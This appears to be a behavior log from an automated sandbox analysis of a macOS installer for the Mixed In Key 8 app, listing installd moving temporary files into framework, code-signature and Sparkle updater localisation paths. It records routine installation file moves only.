              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_zFxyM0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKVolumeAnalyzer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_7vJkmg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisCuePoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_PohI1a -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeatAnalyzer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qyzYdV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKEnergySegment.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_AkzSJ2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftIOKit.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/.BC.T_nHJCe0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/.BC.T_KvHEiV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/.BC.T_mBwicl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_mJSjZF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/com.andymatuschak.Sparkle.SandboxServiceJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/.BC.T_4kpeZa -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/AutoupdateJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_0BzEPj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_fOBgBb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_0lCKB4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_tgHdre -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_e9JCoi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_3DQC00 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_WzOT8D -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_gxS1bP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_zVwsky -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_5Gcdsl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_kmCfND -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_cOVAUX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_fdyCai -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_nQia5J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_0PMEqd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_1swI2W -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_GfOTKx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_0Yowhw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_6CbDDd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_AC3tHK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_DbQkju -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_nZqIB0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_rciL5N -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_77pz2K -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.stringsJump to behavior
